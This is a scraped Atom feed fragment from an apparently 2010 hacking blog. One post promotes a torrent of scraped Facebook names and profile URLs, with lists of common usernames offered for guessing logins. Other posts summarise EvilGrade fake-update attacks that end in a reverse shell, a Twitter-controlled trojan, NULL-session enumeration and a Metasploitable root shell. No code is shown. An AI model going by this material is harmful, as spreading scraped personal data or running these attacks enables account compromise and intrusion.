0px; text-decoration: none;&quot;&gt;list of the top usernames&lt;/a&gt;&lt;span class=&quot;Apple-converted-space&quot;&gt;&amp;nbsp;&lt;/span&gt;(based on first initial last name):&lt;/div&gt;&lt;pre style=&quot;background-color: #3a3936; border: 1px solid rgb(0, 0, 0); color: white; display: block; font: 11px &#39;Courier New&#39;,Courier,monospace; margin: 10px 15px; padding: 5px; width: 565px;&quot;&gt;129369 jsmith
  79365 ssmith
  77713 skhan
  75561 msmith
  74575 skumar
  72467 csmith
  71791 asmith
  67786 jjohnson
  66693 dsmith
  66431 akhan&lt;/pre&gt;&lt;div style=&quot;line-height: 16px; margin: 0px 0px 18px; padding: 0px;&quot;&gt;Or&lt;span class=&quot;Apple-converted-space&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;a href=&quot;http://www.blogger.com/blogdata/facebook-first.l-withcount.txt.bz2&quot; style=&quot;color: #989c50; margin: 0px; padding: 0px; text-decoration: none;&quot;&gt;first name last initial&lt;/a&gt;:&lt;/div&gt;&lt;pre style=&quot;background-color: #3a3936; border: 1px solid rgb(0, 0, 0); color: white; display: block; font: 11px &#39;Courier New&#39;,Courier,monospace; margin: 10px 15px; padding: 5px; width: 565px;&quot;&gt;100225 johns
  97676 johnm
  97310 michaelm
  93386 michaels
  88978 davids
  85481 michaelb
  84824 davidm
  82677 davidb
  81500 johnb
  77800 michaelc&lt;/pre&gt;&lt;div style=&quot;line-height: 16px; margin: 0px 0px 18px; padding: 0px;&quot;&gt;Or even the top usernames based on first name dot last name (sorry, I can&#39;t link this one due to bandwidth concerns; but it&#39;s included in&lt;span class=&quot;Apple-converted-space&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;a href=&quot;http://www.blogger.com/blogdata/fbdata.torrent&quot; style=&quot;color: #989c50; margin: 0px; padding: 0px; text-decoration: none;&quot;&gt;the torrent&lt;/a&gt;):&lt;/div&gt;&lt;pre style=&quot;background-color: #3a3936; border: 1px solid rgb(0, 0, 0); color: white; display: block; font: 11px &#39;Courier New&#39;,Courier,monospace; margin: 10px 15px; padding: 5px; width: 565px;&quot;&gt;17204 john.smith
   7440 david.smith
   7200 michael.smith
   6784 chris.smith
   6371 mike.smith
   6149 arun.kumar
   5980 james.smith
   5939 amit.kumar
   5926 imran.khan
   5861 jason.smith&lt;/pre&gt;&lt;div style=&quot;line-height: 16px; margin: 0px 0px 18px; padding: 0px;&quot;&gt;Or even the most common&lt;span class=&quot;Apple-converted-space&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;a href=&quot;http://www.blogger.com/blogdata/facebook-firstnames-withcount.txt.bz2&quot; style=&quot;color: #989c50; margin: 0px; padding: 0px; text-decoration: none;&quot;&gt;first&lt;/a&gt;&lt;span class=&quot;Apple-converted-space&quot;&gt;&amp;nbsp;&lt;/span&gt;or&lt;span class=&quot;Apple-converted-space&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;a href=&quot;http://www.blogger.com/blogdata/facebook-lastnames-withcount.txt.bz2&quot; style=&quot;color: #989c50; margin: 0px; padding: 0px; text-decoration: none;&quot;&gt;last&lt;/a&gt;&lt;span class=&quot;Apple-converted-space&quot;&gt;&amp;nbsp;&lt;/span&gt;names:&lt;/div&gt;&lt;pre style=&quot;background-color: #3a3936; border: 1px solid rgb(0, 0, 0); color: white; display: block; font: 11px &#39;Courier New&#39;,Courier,monospace; margin: 10px 15px; padding: 5px; width: 565px;&quot;&gt;977014 michael
 963693 john
 924816 david
 819879 chris
 640957 mike
 602088 james
 584438 mark
 515686 jason
 503658 robert
 484403 jessica

 913465 smith
 571819 johnson
 512312 jones
 503266 williams
 471390 brown
 386764 lee
 360010 khan
 355639 singh
 343220 kumar
 324972 miller&lt;/pre&gt;&lt;div style=&quot;line-height: 16px; margin: 0px 0px 18px; padding: 0px;&quot;&gt;So, those are the top 10 lists. But I&#39;ll bet you want everything!&lt;/div&gt;&lt;h2 style=&quot;color: #989c50; font-family: &#39;Trebuchet MS&#39;,Verdana,sans-serif; font-size: 16px; font-weight: bold; margin: 0px; padding: 0px;&quot;&gt;The Torrent&lt;/h2&gt;&lt;div style=&quot;line-height: 16px; margin: 0px 0px 18px; padding: 0px;&quot;&gt;But it occurred to me that this is public information that Facebook puts out, I&#39;m assuming for search engines or whatever, and that it wouldn&#39;t be right for me to keep it private. Why waste Facebook&#39;s bandwidth and make everybody scrape it, right?&lt;/div&gt;&lt;div style=&quot;line-height: 16px; margin: 0px 0px 18px; padding: 0px;&quot;&gt;So, I present you with:&lt;span class=&quot;Apple-converted-space&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;strong style=&quot;font-weight: bold; margin: 0px; padding: 0px;&quot;&gt;&lt;a href=&quot;http://www.blogger.com/blogdata/fbdata.torrent&quot; style=&quot;color: #989c50; margin: 0px; padding: 0px; text-decoration: none;&quot;&gt;a torrent&lt;/a&gt;&lt;/strong&gt;! If you haven&#39;t download it, download it now! And seed it for as long as you can.&lt;/div&gt;&lt;div style=&quot;line-height: 16px; margin: 0px 0px 18px; padding: 0px;&quot;&gt;This torrent contains:&lt;/div&gt;&lt;ul style=&quot;list-style-position: outside; list-style-type: square; margin: 8px 8px 8px 20px; padding: 0px;&quot;&gt;&lt;li style=&quot;margin: 0px; padding: 0px;&quot;&gt;The URL of every searchable Facebook user&#39;s profile&lt;/li&gt;
&lt;li style=&quot;margin: 0px; padding: 0px;&quot;&gt;The name of every searchable Facebook user, both unique and by count (perfect for post-processing, datamining, etc)&lt;/li&gt;
&lt;li style=&quot;margin: 0px; padding: 0px;&quot;&gt;Processed lists, including first names with count, last names with count, potential usernames with count, etc&lt;/li&gt;
&lt;li style=&quot;margin: 0px; padding: 0px;&quot;&gt;The programs I used to generate everything&lt;/li&gt;
&lt;/ul&gt;&lt;div style=&quot;line-height: 16px; margin: 0px 0px 18px; padding: 0px;&quot;&gt;So, there you have it: lots of awesome data from Facebook. Now, I just have to find one more problem with Facebook so I can write &quot;Revenge of the Facebook Snatchers&quot; and complete the trilogy. Any suggestions? &amp;gt;:-)&lt;/div&gt;&lt;/span&gt;&lt;/span&gt;</content><link rel='replies' type='application/atom+xml' href='http://bukibv.blogspot.com/feeds/4167536241629531163/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://bukibv.blogspot.com/2010/07/return-of-facebook-snatchers.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2408596200810928464/posts/default/4167536241629531163'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2408596200810928464/posts/default/4167536241629531163'/><link rel='alternate' type='text/html' href='http://bukibv.blogspot.com/2010/07/return-of-facebook-snatchers.html' title='Return of the Facebook Snatchers'/><author><name>bi0</name><uri>http://www.blogger.com/profile/14620421761593085083</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgev5ERfeuQHk5ImsapFVR-TxsvBa7tFX4MXU7RG2P0dY87L4OVDZdv-bg73Hy1OBRgQzphIYOp7uUHeR9zrz6QJrFFRPsMKboVuKfeXU3oTkcQ7EnFas6v9P-mdrfsMgI/s1600/*'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2408596200810928464.post-7980979357265807910</id><published>2010-05-23T06:32:00.000-07:00</published><updated>2010-05-23T06:40:03.151-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="EvilGrade"/><title type='text'>Hacking Software Updates with EvilGrade</title><content type='html'>&lt;object height=&quot;250&quot; width=&quot;400&quot;&gt;&lt;param name=&quot;allowfullscreen&quot; value=&quot;true&quot; /&gt;&lt;param name=&quot;allowscriptaccess&quot; value=&quot;always&quot; /&gt;&lt;param name=&quot;movie&quot; value=&quot;http://vimeo.com/moogaloop.swf?clip_id=1575771&amp;amp;server=vimeo.com&amp;amp;show_title=1&amp;amp;show_byline=1&amp;amp;show_portrait=0&amp;amp;color=&amp;amp;fullscreen=1&quot; /&gt;&lt;embed src=&quot;http://vimeo.com/moogaloop.swf?clip_id=1575771&amp;amp;server=vimeo.com&amp;amp;show_title=1&amp;amp;show_byline=1&amp;amp;show_portrait=0&amp;amp;color=&amp;amp;fullscreen=1&quot; type=&quot;application/x-shockwave-flash&quot; allowfullscreen=&quot;true&quot; allowscriptaccess=&quot;always&quot; width=&quot;400&quot; height=&quot;250&quot;&gt;&lt;/embed&gt;&lt;/object&gt;&lt;br /&gt;
&lt;a href=&quot;http://vimeo.com/1575771&quot;&gt;&lt;/a&gt;&lt;a href=&quot;http://vimeo.com/user595761&quot;&gt;&lt;/a&gt; &lt;a href=&quot;http://vimeo.com/&quot;&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;a href=&quot;http://www.infobyte.com.ar/developments.html&quot;&gt;Evilgrade&lt;/a&gt; is a modular framework that allow us to take advantage of poor upgrade implementations by injecting fake updates. It works with modules, each module implements the structure needed to emulate a false update of specific applications/systems. Evilgrade needs the manipulation of the victim dns traffic and uses either of DNS cache poisoning,  &lt;a href=&quot;http://www.amazon.com/TCP-Guide-Comprehensive-Illustrated-Protocols/dp/159327047X?ie=UTF8&amp;amp;tag=itsec028-20&amp;amp;link_code=btl&amp;amp;camp=213689&amp;amp;creative=392969&quot; target=&quot;_blank&quot;&gt;ARP&lt;/a&gt;&lt;img alt=&quot;&quot; border=&quot;0&quot; height=&quot;1&quot; src=&quot;http://www.assoc-amazon.com/e/ir?t=itsec028-20&amp;amp;l=btl&amp;amp;camp=213689&amp;amp;creative=392969&amp;amp;o=1&amp;amp;a=159327047X&quot; style=&quot;border: medium none ! important; margin: 0px ! important; padding: 0px ! important;&quot; width=&quot;1&quot; /&gt; spoofing, &lt;a href=&quot;http://www.amazon.com/DHCP-Guide-Dynamic-Network-Configuration/dp/0130997218?ie=UTF8&amp;amp;tag=itsec028-20&amp;amp;link_code=btl&amp;amp;camp=213689&amp;amp;creative=392969&quot; target=&quot;_blank&quot;&gt;DHCP&lt;/a&gt;&lt;img alt=&quot;&quot; border=&quot;0&quot; height=&quot;1&quot; src=&quot;http://www.assoc-amazon.com/e/ir?t=itsec028-20&amp;amp;l=btl&amp;amp;camp=213689&amp;amp;creative=392969&amp;amp;o=1&amp;amp;a=0130997218&quot; style=&quot;border: medium none ! important; margin: 0px ! important; padding: 0px ! important;&quot; width=&quot;1&quot; /&gt; spoofing or Internal &lt;a href=&quot;http://www.amazon.com/DNS-Dummies-Blair-Rampling/dp/0764516833?ie=UTF8&amp;amp;tag=itsec028-20&amp;amp;link_code=btl&amp;amp;camp=213689&amp;amp;creative=392969&quot; target=&quot;_blank&quot;&gt;DNS&lt;/a&gt;&lt;img alt=&quot;&quot; border=&quot;0&quot; height=&quot;1&quot; src=&quot;http://www.assoc-amazon.com/e/ir?t=itsec028-20&amp;amp;l=btl&amp;amp;camp=213689&amp;amp;creative=392969&amp;amp;o=1&amp;amp;a=0764516833&quot; style=&quot;border: medium none ! important; margin: 0px ! important; padding: 0px ! important;&quot; width=&quot;1&quot; /&gt; access to accomplish this. Once EvilGrade has inserted itself as the man-in-the-middle it intercepts automatic update requests for the softwares it supports and injects the malicious payload as the &quot;update&quot;. This payload can be configured to whichever binary the hacker wants. Once the victim downloads this malicious &quot;update&quot; and runs it, the hacker has full control of his system&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;Currently, EvilGrade Supports the interception of the following upgrade mechanisms:&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;- Java plugin&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;- &lt;a href=&quot;http://www.amazon.com/Corel-WZENGSU14PRPRO-WINzip-Professional-1-User/dp/B002UXTNSU?ie=UTF8&amp;amp;tag=itsec028-20&amp;amp;link_code=btl&amp;amp;camp=213689&amp;amp;creative=392969&quot; target=&quot;_blank&quot;&gt;Winzip&lt;/a&gt;&lt;img alt=&quot;&quot; border=&quot;0&quot; height=&quot;1&quot; src=&quot;http://www.assoc-amazon.com/e/ir?t=itsec028-20&amp;amp;l=btl&amp;amp;camp=213689&amp;amp;creative=392969&amp;amp;o=1&amp;amp;a=B002UXTNSU&quot; style=&quot;border: medium none ! important; margin: 0px ! important; padding: 0px ! important;&quot; width=&quot;1&quot; /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;- &lt;a href=&quot;http://www.amazon.com/Windows-Ripping-Software-Musicmatch-Dbpoweramp/dp/1155299396?ie=UTF8&amp;amp;tag=itsec028-20&amp;amp;link_code=btl&amp;amp;camp=213689&amp;amp;creative=392969&quot; target=&quot;_blank&quot;&gt;Winamp&lt;/a&gt;&lt;img alt=&quot;&quot; border=&quot;0&quot; height=&quot;1&quot; src=&quot;http://www.assoc-amazon.com/e/ir?t=itsec028-20&amp;amp;l=btl&amp;amp;camp=213689&amp;amp;creative=392969&amp;amp;o=1&amp;amp;a=1155299396&quot; style=&quot;border: medium none ! important; margin: 0px ! important; padding: 0px ! important;&quot; width=&quot;1&quot; /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;- &lt;a href=&quot;http://www.amazon.com/Mac-version-10-6-Snow-Leopard/dp/B001AMHWP8?ie=UTF8&amp;amp;tag=itsec028-20&amp;amp;link_code=btl&amp;amp;camp=213689&amp;amp;creative=392969&quot; target=&quot;_blank&quot;&gt;MacOS&lt;/a&gt;&lt;img alt=&quot;&quot; border=&quot;0&quot; height=&quot;1&quot; src=&quot;http://www.assoc-amazon.com/e/ir?t=itsec028-20&amp;amp;l=btl&amp;amp;camp=213689&amp;amp;creative=392969&amp;amp;o=1&amp;amp;a=B001AMHWP8&quot; style=&quot;border: medium none ! important; margin: 0px ! important; padding: 0px ! important;&quot; width=&quot;1&quot; /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;- OpenOffices&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;- iTunes&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;- Linkedin Toolbar&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;- DAP [Download Accelerator]&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;- notepad++&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;- speedbit&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;
&lt;div ontop=&quot;true&quot; style=&quot;display: none; padding-left: 0px;&quot;&gt;&lt;/div&gt;&lt;embed allowfullscreen=&quot;true&quot; allowscriptaccess=&quot;always&quot; height=&quot;481&quot; src=&quot;http://blip.tv/play/hdkFgd7WAQI%2Em4v&quot; type=&quot;application/x-shockwave-flash&quot; width=&quot;480&quot;&gt;&lt;/embed&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;We had covered EvilGrade a while back. In this demo, g0tmi1k shows us a demo of EvilGrade using Notepad Plus. The underlying hack uses an ARP MITM and DNS Poisoning to redirect all software upgrade request checks to the attacker&#39;s server. This server serves a metasploit payload to Notepad Plus instead of the actual payload. Once the update gets exectuted a reverse connect shell provides full access to the victim&#39;s computer.&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;
&lt;div style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;# ITS™ &lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;# 2009 - 2010&lt;/span&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://bukibv.blogspot.com/feeds/7980979357265807910/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://bukibv.blogspot.com/2010/05/hacking-software-updates-with-evilgrade.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2408596200810928464/posts/default/7980979357265807910'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2408596200810928464/posts/default/7980979357265807910'/><link rel='alternate' type='text/html' href='http://bukibv.blogspot.com/2010/05/hacking-software-updates-with-evilgrade.html' title='Hacking Software Updates with EvilGrade'/><author><name>bi0</name><uri>http://www.blogger.com/profile/14620421761593085083</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgev5ERfeuQHk5ImsapFVR-TxsvBa7tFX4MXU7RG2P0dY87L4OVDZdv-bg73Hy1OBRgQzphIYOp7uUHeR9zrz6QJrFFRPsMKboVuKfeXU3oTkcQ7EnFas6v9P-mdrfsMgI/s1600/*'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2408596200810928464.post-387795932585829373</id><published>2010-05-23T05:35:00.000-07:00</published><updated>2010-05-23T05:35:46.843-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Botnet"/><title type='text'>Twitter based Botnet Command and Control</title><content type='html'>&lt;object height=&quot;340&quot; width=&quot;560&quot;&gt;&lt;param name=&quot;movie&quot; value=&quot;http://www.youtube.com/v/r_F3VheC9ww&amp;hl=en_US&amp;fs=1&amp;rel=0&quot;&gt;&lt;/param&gt;&lt;param name=&quot;allowFullScreen&quot; value=&quot;true&quot;&gt;&lt;/param&gt;&lt;param name=&quot;allowscriptaccess&quot; value=&quot;always&quot;&gt;&lt;/param&gt;&lt;embed src=&quot;http://www.youtube.com/v/r_F3VheC9ww&amp;hl=en_US&amp;fs=1&amp;rel=0&quot; type=&quot;application/x-shockwave-flash&quot; allowscriptaccess=&quot;always&quot; allowfullscreen=&quot;true&quot; width=&quot;560&quot; height=&quot;340&quot;&gt;&lt;/embed&gt;&lt;/object&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;In this video from &lt;a href=&quot;http://www.amazon.com/Norton-Internet-Security-2010-1-User/dp/B002L7BR20?ie=UTF8&amp;amp;tag=itsec028-20&amp;amp;link_code=btl&amp;amp;camp=213689&amp;amp;creative=392969&quot; target=&quot;_blank&quot;&gt;Symantec&lt;/a&gt;&lt;img alt=&quot;&quot; border=&quot;0&quot; height=&quot;1&quot; src=&quot;http://www.assoc-amazon.com/e/ir?t=itsec028-20&amp;amp;l=btl&amp;amp;camp=213689&amp;amp;creative=392969&amp;amp;o=1&amp;amp;a=B002L7BR20&quot; style=&quot;border: medium none ! important; margin: 0px ! important; padding: 0px ! important;&quot; width=&quot;1&quot; /&gt;, we look at a demo of the Trojan.Twetbot trojan. As the name suggests, the builder is closely linked to Twitter, using a Twitter account to issue command-and-control instructions to the Trojans created by the builder. When building Trojan.Twebot, the user is able to supply a public Twitter account for Trojan.Twebot to follow. Because Trojan.Twebot does not try to obfuscate commands on Twitter, it will not be difficult for Twitter security staff to find and close accounts abusing their service in this way.&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;# ITS™  &lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;# 2009 - 2010&lt;/span&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://bukibv.blogspot.com/feeds/387795932585829373/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://bukibv.blogspot.com/2010/05/twitter-based-botnet-command-and.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2408596200810928464/posts/default/387795932585829373'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2408596200810928464/posts/default/387795932585829373'/><link rel='alternate' type='text/html' href='http://bukibv.blogspot.com/2010/05/twitter-based-botnet-command-and.html' title='Twitter based Botnet Command and Control'/><author><name>bi0</name><uri>http://www.blogger.com/profile/14620421761593085083</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgev5ERfeuQHk5ImsapFVR-TxsvBa7tFX4MXU7RG2P0dY87L4OVDZdv-bg73Hy1OBRgQzphIYOp7uUHeR9zrz6QJrFFRPsMKboVuKfeXU3oTkcQ7EnFas6v9P-mdrfsMgI/s1600/*'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2408596200810928464.post-5024728207501392569</id><published>2010-05-23T05:29:00.000-07:00</published><updated>2010-05-23T05:31:32.080-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="metasploit"/><title type='text'>Null Session Hacking on Windows</title><content type='html'>&lt;object height=&quot;30&quot; width=&quot;400&quot;&gt;&lt;param name=&quot;allowfullscreen&quot; value=&quot;true&quot; /&gt;&lt;param name=&quot;allowscriptaccess&quot; value=&quot;always&quot; /&gt;&lt;param name=&quot;movie&quot; value=&quot;http://vimeo.com/moogaloop.swf?clip_id=11890370&amp;amp;server=vimeo.com&amp;amp;show_title=1&amp;amp;show_byline=1&amp;amp;show_portrait=0&amp;amp;color=&amp;amp;fullscreen=1&quot; /&gt;&lt;embed src=&quot;http://vimeo.com/moogaloop.swf?clip_id=11890370&amp;amp;server=vimeo.com&amp;amp;show_title=1&amp;amp;show_byline=1&amp;amp;show_portrait=0&amp;amp;color=&amp;amp;fullscreen=1&quot; type=&quot;application/x-shockwave-flash&quot; allowfullscreen=&quot;true&quot; allowscriptaccess=&quot;always&quot; width=&quot;400&quot; height=&quot;300&quot;&gt;&lt;/embed&gt;&lt;/object&gt;&lt;br /&gt;
&lt;a href=&quot;http://vimeo.com/11890370&quot;&gt;Practical Exploitation - Null Session Enum&lt;/a&gt; from &lt;a href=&quot;http://vimeo.com/user3245922&quot;&gt;&lt;/a&gt; &lt;a href=&quot;http://vimeo.com/&quot;&gt;&lt;/a&gt;.&lt;br /&gt;
&lt;br /&gt;
A NULL session connection is an unauthenticated connection to an Windows machine. Gaining NULL session access to a Windows system is the number one method for hackers to enumerating information about the machine.  From a NULL session hackers can call APIs and use Remote Procedure calls to enumerate information. These techniques can, and will provide information on passwords, groups, services, users and even active processors. NULL session access can also even be used for escalating privileges and perform DoS attacks.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
# ITS™  &lt;br /&gt;
# 2009 - 2010&lt;br /&gt;
&lt;br /&gt;
===[ ADS ]===&lt;br /&gt;
&lt;a href=&quot;http://www.amazon.com/Microsoft-Windows-Home-UPGRADE-SP2/dp/B0002423YK?ie=UTF8&amp;amp;tag=itsec028-20&amp;amp;link_code=btl&amp;amp;camp=213689&amp;amp;creative=392969&quot; target=&quot;_blank&quot;&gt;Microsoft Windows XP Home Edition UPGRADE with SP2&lt;/a&gt;&lt;img alt=&quot;&quot; border=&quot;0&quot; height=&quot;1&quot; src=&quot;http://www.assoc-amazon.com/e/ir?t=itsec028-20&amp;amp;l=btl&amp;amp;camp=213689&amp;amp;creative=392969&amp;amp;o=1&amp;amp;a=B0002423YK&quot; style=&quot;border: medium none ! important; margin: 0px ! important; padding: 0px ! important;&quot; width=&quot;1&quot; /&gt;&lt;br /&gt;
&lt;a target=&quot;_blank&quot;  href=&quot;http://www.amazon.com/Microsoft-Windows-Professional-Full-Version/dp/B00022PTI4?ie=UTF8&amp;tag=itsec028-20&amp;link_code=btl&amp;camp=213689&amp;creative=392969&quot;&gt;Microsoft Windows XP Professional Full Version with SP2&lt;/a&gt;&lt;img src=&quot;http://www.assoc-amazon.com/e/ir?t=itsec028-20&amp;l=btl&amp;camp=213689&amp;creative=392969&amp;o=1&amp;a=B00022PTI4&quot; width=&quot;1&quot; height=&quot;1&quot; border=&quot;0&quot; alt=&quot;&quot; style=&quot;border:none !important; margin:0px !important; padding: 0px !important&quot; /&gt;</content><link rel='replies' type='application/atom+xml' href='http://bukibv.blogspot.com/feeds/5024728207501392569/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://bukibv.blogspot.com/2010/05/null-session-hacking-on-windows.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2408596200810928464/posts/default/5024728207501392569'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2408596200810928464/posts/default/5024728207501392569'/><link rel='alternate' type='text/html' href='http://bukibv.blogspot.com/2010/05/null-session-hacking-on-windows.html' title='Null Session Hacking on Windows'/><author><name>bi0</name><uri>http://www.blogger.com/profile/14620421761593085083</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='27' height='32' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgev5ERfeuQHk5ImsapFVR-TxsvBa7tFX4MXU7RG2P0dY87L4OVDZdv-bg73Hy1OBRgQzphIYOp7uUHeR9zrz6QJrFFRPsMKboVuKfeXU3oTkcQ7EnFas6v9P-mdrfsMgI/s1600/*'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2408596200810928464.post-3548021762745247536</id><published>2010-05-23T05:08:00.000-07:00</published><updated>2010-05-23T05:08:26.728-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="metasploit"/><title type='text'>Root Shell via Metasploit and MySQL Client on Metasploitable</title><content type='html'>&lt;object height=&quot;340&quot; width=&quot;560&quot;&gt;&lt;param name=&quot;movie&quot; value=&quot;http://www.youtube.com/v/O_5N9_sZ3i8&amp;hl=en_US&amp;fs=1&amp;rel=0&quot;&gt;&lt;/param&gt;&lt;param name=&quot;allowFullScreen&quot; value=&quot;true&quot;&gt;&lt;/param&gt;&lt;param name=&quot;allowscriptaccess&quot; value=&quot;always&quot;&gt;&lt;/param&gt;&lt;embed src=&quot;http://www.youtube.com/v/O_5N9_sZ3i8&amp;hl=en_US&amp;fs=1&amp;rel=0&quot; type=&quot;application/x-shockwave-flash&quot; allowscriptaccess=&quot;always&quot; allowfullscreen=&quot;true&quot; width=&quot;560&quot; height=&quot;340&quot;&gt;&lt;/embed&gt;&lt;/object&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;div style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;In this video, redmeat_uk demonstrates how to obtain a root shell from Metasploitable, a VMware machine of vulnerable applications and services. This example will demonstrate how to obtain a root shell via Metasploit auxiliary modules and the MySQL client&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;br /&gt;
